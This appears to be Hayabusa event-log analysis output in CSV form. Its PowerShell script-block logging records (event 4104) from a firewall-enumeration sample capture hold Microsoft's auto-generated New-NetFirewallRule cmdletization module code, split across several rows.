",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'I",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,n'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_def,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"aultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 